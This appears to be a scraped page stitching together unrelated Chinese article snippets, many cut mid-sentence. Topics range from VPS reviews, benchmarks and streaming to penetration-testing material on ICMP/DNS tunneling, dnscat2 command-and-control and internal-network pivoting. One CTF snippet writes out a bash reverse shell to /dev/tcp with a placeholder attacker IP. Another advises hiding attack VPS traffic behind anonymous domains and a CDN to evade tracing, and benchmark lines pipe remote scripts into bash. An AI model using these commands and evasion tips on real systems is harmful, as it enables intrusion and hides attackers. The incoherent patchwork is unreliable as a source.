在一次漏洞赏金活动中,挖到个命令注入的洞,我先以时延作为证明向厂商提交该漏洞,厂商以国内网络环境差为由(的确得翻墙)拒收,几次沟通,告知若我能取回指定文件 secret.txt 才认可。目标是个受限环境:禁止出口流量、NAT 映射至公网、无页面回显、无法猜测 web 目录,换言之,没有出口流量无法反弹 shell、NAT 隔离也就不能建立正向 shell、页面无输出想看到命令结果不可能、找不到 web 目即便成功创建 webshell 没有容器能解析。我如何才能查看 secret.txt,顺利拿到赏金呢?(嗯,金额是敏感信息嘛 5C7ZR2FOWDS35FZANBQXEZDTMVSWIIHFSCL67PE74W7IRZN7VPS25A7FWCDOLJEN422LX354QEFA====)
在上一篇文章中,我们讲解了木马中常用的端口转发技术,这一节讲解一下木马通信协议中的ICMP协议,并通过ICMP实现一个反弹shell。
N1book---死亡ping命令 有时候命令执行的题目限制了字数或者某些函数被禁用了,那么此时可以用反弹shell的效果,连接题目的机器 一般来说,构造bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/xxxxx 0>&1的方式,发送到客户端执行,但是有时候不一定可以,可能会报错啥的,所以此时可以在只记得vps中,新建一个页面,比如xxx.xxx.xxx.xxx/bash.php中的内容是bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/xxxxx 0>&1,然
4. 配置 WireGuard:在 VPS 主机上创建一个 WireGuard 配置文件 wg0.conf,将以下配置信息添加到该文件中:
这是一种新的墙,以前我新建日本的vps的时候,其IPv4地址是直接的ping不通,但这次不一样,IPv4地址能够正常的ping,可就是国外与国内扫描端口不一样!
iodine是基于C语言开发的,分为服务端和客户端。iodine支持转发模式和中继模式。其原理是:通过TAP虚拟网卡,在服务端建立一个局域网;在客户端,通过TAP建立一个虚拟网卡;两者通过DNS隧道连接,处于同一个局域网(可以通过ping命令通信)。在客户端和服务器之间建立连接后,客户机上会多出一块名为dns0的虚拟网卡。
当我们在外网打下一个点,通过arp,netstat,以及ifconifg(ipconfig)等信息收集,发现此点为dmz,可通内网,那么这时候我们需要在此点上搭建通向内网的隧道,为内网渗透打下坚实基础。
直到看了Micro8大佬写的教程,我才发现,原来tmux 还可以实现后台不间断运行程序,我跟你说这个功能老牛了!
哪吒面板是一个类似于ServerStatus的服务器状态监控程序,不过,哪吒面板相对来说功能更强大一些,哪吒监控 支持服务器系统状态监控、HTTP(SSL 证书变更、即将到期、到期)、TCP、Ping 监控报警,命令批量执行和计划任务,是一个一站式轻监控轻运维系统。
首先,你需要一台 VPS,并注册一个 ZeroTier 帐号:https://my.zerotier.com
ansible是一种自动化运维工具,基于Python开发,集合了众多运维工具(puppet、cfengine、chef、func、fabric)的优点,实现批量系统配置、批量程序部署、批量运行命令等功能。现,简单介绍下ansible使用方法。
搬瓦工已经是非常知名的VPS商了,其最大的优势是低廉的价格和优异的网络性能(非硬件性能),而为了摆脱超售的名声,搬瓦工也在积极降低KVM虚拟机的价格,KVM最大的优势为内存独享,而传统OpenVZ内存为共享,可以无限超售。在几天前的双十一,搬瓦工更是给出了迄今为止,甚至是全球同配置同网络的最低价,诚意十足!
在之前的文章中我介绍了使用 DNS-Shell 和 Dnscat2 利用DNS协议来进行命令控制,通过DNS协议进行通信,使得流量更加隐秘,躲避agent/DLP等安全设备的检测,实现相对隐秘的命令控制。
收集一些自用的shell脚本,适用于懒人,关键词替换为 5hadows0cks 和 v7n 原因你懂的。
pingtunnel 是tcp/udp/sock5 流量伪装成icmp流量进行转发的工具。
前面一次网进行了内网渗透,这里做个人小结,也方便其他小伙伴学习EW。这里仅记录后渗透中与EW相关的部分已提前在tomcat中留下冰蝎马。
在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。
ICMP隧道简单实用,是一个比较特殊的协议。在一般的通信协议里,如果两台设备要进行通信,肯定需要开放端口,而在ICMP协议下就不需要。最常见的ping命令就是利用的ICMP协议,攻击者可以利用命令行得到比回复更多的ICMP请求。在通常情况下,每个ping命令都有相应的回复与请求。
通过一个工具基本可以满足演练过程中打隧道的要求(可惜不支持dns协议)。这篇文章主要是自己研究该工具如何使用的过程 0x02 工具简介
https://tunnelbroker.net/ ,注册帐号后点击左侧“User Functions”中的“Create Regular Tunnel”,在“IPv4 Endpoint”中填入你 VPS 的 IP 地址,“Available Tunnel Servers”是自行选择一个隧道入口,就近选择即可,然后点最下方”Create Tunnel“,耐心等待创建成功后你会来到隧道详情页面,你会看到”Routed /48“右侧有个”Assign /48“,点一下,申请/48地址块,并记录下这个地址块,后面需要用到),或者也可以用自己有广播好的ipv6{ip地址标记①}.
完整攻击链大概包括信息搜集、漏洞利用、建立据点、权限提升、权限维持、横向移动、痕迹清除等七步,虽然这个站点只经历了前四步,但也具有较强的代表性,组合利用漏洞形成攻击连,拿下管理权限。
市场上有很多云盘的产品,比如百度云盘,不过本教程主要目的是要搭建个人私有云盘。查了网上很多资料,个人云盘也有很多,比如nextcloud,owncloud,seafile等。这里选择nextcloud,优势就不用说了,网上一搜一大把。
dnscat2是一款开源软件,使用DNS协议创建加密的C&C通道,通过预共享密钥进行身份验证;使用Shell及DNS查询类型(TXT、MX、CNAME、A、AAAA),多个同时进行的会话类似于SSH中的隧道。dnscat2的客户端是有Windows版和Linux版,服务端是用Ruby语言编写的。严格的说,dnscat2是一个命令与控制工具。
1、vps打开TUN/TAP 一般在vps面板里就可以打开,如果没有,发tickets给客服 2、判断是否成功打开TUN/TAP cat /dev/net/tun 返回值如下即为打开成功 File descriptor in bad state 3、如果本机glibc小于2.14,先更新glibc ldd --version 如果小于2.14,则需要编译安装新版本>2.14 先安装gcc yum install gcc 再编译glibc wget http://ftp.gnu.org/gnu/glibc
1.传统访问:用户访问域名–>解析服务器IP–>访问目标主机 2.普通CDN:用户访问域名–>CDN节点–>真实服务器IP–>访问目标主机 3.带WAF的CDN:用户访问域名–>CDN节点(WAF)–>真实服务器IP–>访问目标主机
公司业务发展过程中,随着用户规模的增长。不管是采用传统的idc模式,还是最近比较火的vps。作为运维,不免被老板灵魂拷问,哪家的vps比较好,哪家的idc比较好。价格上没什么好说的,谁高谁低,一幕了然。但是相同的价格下,要比较初一个优劣,肯定要用数据说话。 祭出搜索引擎,一顿搜索。找到了网络上存在的的一键测试脚本,然后再使用过程中,发现输出要不就是相对简单,要不就是很久没有更新了,部分功能失效。 服务器(vps)性能测试脚本汇总 给老板看总不能截几张图就完了吧。于是采众家之长,自己做了一个,起名idcmonitor。以后再也不担心老板要评估选点了。
当你在浏览器中输入域名访问网站时,它首先会向 DNS 服务器发送请求来查找域名对应的 IP 地址。找到 IP 地址之后,就会通过 IP 定位到对应的服务器然后获取网站的内容。这整个过程仅仅只需要几毫秒。DNS 默认是运行在 53 端口上。
这次渗透是从站库分离的情况下在深入进去内网在拿下域控服务器,也都是普通的渗透思路,并没有什么技术含量!首先WEB点是一个MSSQL注入漏洞,并且这个注入是sa权限的!首先这个站点是使用JoomlaCMS搭建的,但是在一处Study信息登记处发现了SQL注入漏洞
ICMP是一个比较特殊的协议,在一般的通信协议里如果两台设备要进行通信,肯定需要开放端口,而在ICMP协议下就不需要,最常见的ICMP消息为ping命令的回复,攻击者可以利用命令行得到比回复更多的ICMP请求,在通常情况下,每个ping命令都有相对应的回复与请求
Linode在国内站长圈中是数一数二的 VPS 商家,提供的日本 TK1 线路早已经成为“传家宝”被大家长期收藏。今天我们来写一下开通Linode 日本 TK2 机房线路体验及速度性能评测的过程。希望对初次接触 Linode 的朋友有所帮助,这也是老魏写博客一直坚持的想法。 相关阅读: Linode 5 美元新方案 1G 内存/1CPU/20G SSD Linode-国外最稳定的 VPS 注册付款教程 Linode 收费扣费方式解释 一、Linode 官方网址 点我打开 Linode 官方网站 初次注册付款
由于最近学习内网,打了一些靶场,觉得还是挺枯燥的,就想找一个真实的环境练练手,在hxd的指引下,找了个站去练练手。
感谢朋友@Sin的投稿,这篇文章记录的是他如何发现、利用Shiro反序列化漏洞,又是怎样绕过火绒安全防护实现文件落地、添加管理员,最后进入远程桌面,以及在测试过程中遇到的一些坑。
命令执行漏洞的成因是,由于没有针对代码中可执行的特殊函数入口做过滤,导致用户可以提交恶意语句,并提交服务器执行。
准备 在https://tunnelbroker.net/注册一个账号。然后为IPv4创建常规隧道: 点击Create Regular Tunnel->在IPv4 Endpoint (Your side)里面输入VPS的公网IPv4地址->在Available Tunnel Servers里面选择一个(你认为)距离VPS最近的地方->Create Tunnel。那么你应当会得到类似下面的数据:
这样payload.com的域名解析请求将由nameserver.com完成,同时将nameserver.com指向你的反连平台1.1.1.1
Sugarhosts 糖果主机上线中美极速直连线路后,最近洛杉矶 CN2 线路虚拟主机搞活动,239 元/年限时终身六折,就有网友询问洛杉矶 CN2 虚拟主机的线路测试地址, 魏艾斯博客和官方要了一个洛杉矶 CN2 中美极速直连地址用于速度评测,本文评测过程结果仅供参考。 一、洛杉矶中美直连 CN2 极速线路方案 1、洛杉矶中美极速专线虚拟主机 下面列举的是中美极速专线虚拟主机,本月限时终身优惠,如果是稳定建站使用,推荐选购 Shared Pro,送独立 IP。 Shared Baby 磁盘空间:5GB
通俗的讲就是局域网,网吧、校园网、单位办公网都属于此类。另外光纤到楼、小区宽带、教育网、有线电视Cable Modem上网虽然地域范围比较大但本质上还是基于以太网技术,所以任然属于内网。
nmap扫描某ip的C段,用时大概19h,对识别到的指纹信息依次查看,查看到如下信息
RTSP H.265到RTMP,首先需要扩展RTMP协议。目前,我国已有相应的推广标准,国内开发商基本上都是按照该协议进行推广的。协议层面的问题已经得到解决。剩下的关键问题是实现RTMP H.265推送模块。
以下原因促使我要用腾讯云服务器以及将裸奔了6~7年的域名进行ICP备案: 刚开通的微信公众号, 积极性高涨, 然而每次微信里面跳转到我的 blog, 都会出现上图所示的跳转中间页. 默认继续访问还是看
最近没怎么更新文章,不好意思啊,兄弟姐妹们。现在现实工作也忙。今天就更新一篇漏洞复现的吧,预计明天更新一个实战漏洞挖掘的文章(弱口令+越权)。你们如果想要什么工具,可以在公众号发消息我统一再处理上传。谢谢大家支持。(づ ̄ 3 ̄)づ
※这类脚本是综合测试VPS基础信息、硬盘IO、带宽和网络延迟等项目的一键式脚本,主要有以下几个
今天edusrc突然出了浙大的证书,本来想挖一个浙大中危,不仅挖了4个全重复了,还打偏了一个,故有了这篇文章。
WDCP也算是国产中颇受大家欢迎的VPS主机面板了,提供了nginx、apache、mysql、php等Web建站环境一键搭建。印象中,国内VPS主机面板也就是WDCP还在坚持着,AMH已经走上了收费的道路(PS:免费版本长年不更新,各种问题和不兼容)。
注意事项 收集一些自用的shell脚本,可以放心使用。 服务器TCP回程路由测试 curl https://www.coorw.com/speedtest/test.sh|bash #来自李子博客,适用于centos6/7,测试服务器TCP回程是否为CN2或联通移动直连线路。 VPS一键测速脚本整合版。 📷 使用方法: wget vpstest.cn/it && bash it 或 wget git.io/vpstest && bash vpstest 或 wget -O it vpstest.cn &&
新购买VPS云服务器后常用VPS测试脚本代码:跑分看看你的VPS综合性能。综合测试VPS硬件信息、CPU,核cores,CPU性能跑分,内存,硬盘大小,硬盘I/O speed、speedtest,国内国外下载速度Download Speed和网络延迟,Trace去程回程路由,一键开启BBR等等的测试脚本。测试完之后大家就会对自己的VPS小鸡有个底呢,知道是个什么样的货色。 测试脚本用到的软件:Xshell安装使用教程
版权声明:本文为[他叫自己Mr.张]的原创文章,转载请注明出处,否则禁止转载。 https://micro.blog.csdn.net/article/details/81084184
一,为什么要流量隐藏 在日常使用服务器进行渗透等攻击方式时候,很容易被溯源到所有我们需要对自己的vps进行流量隐藏,这里的VPS最好是匿名的 ,既然是隐藏自身 那么域名肯定不能使用自己备案的域名。 https://www.godaddy.com/zh-sg 注册匿名域名 https://www.cloudflare.com/ 免费CDN 二,什么是CDN CDN 的全称是 Content Delivery Network ,即内容分发网络。其目的是通过在现有的 Internet 中
官网下载地址(下载比较慢):https://www.vulnhub.com/entry/boredhackerblog-social-network,454/ 靶机百度云链接 第一次搭建时,进行主机探测,发现靶机只开了22 ssh服务,我寻思不能ssh爆破一下就结束了吧,查了一下资料,发现靶机还应该开放5000端口。遂重新下载导入了一次才正常(还有一种情况是连主机都探测不到,可能是网络适配器设置问题)
我们在对接开发者的时候,遇到这样的诉求:除了正常的RTMP、RTSP直播播放外,有些硬件设备输出编码后(H.264/H.265)的数据,比如无人机或类似硬件产品,回调出来的H.264/H.265数据,除了正常转推到RTMP、轻量级RTSP服务或GB28181外,还需要本地预览甚至重新对数据做二次处理,基于这样的场景诉求,我们开发了外部编码后数据实时预览播放模块。
领取专属 10元无门槛券
手把手带您无忧上云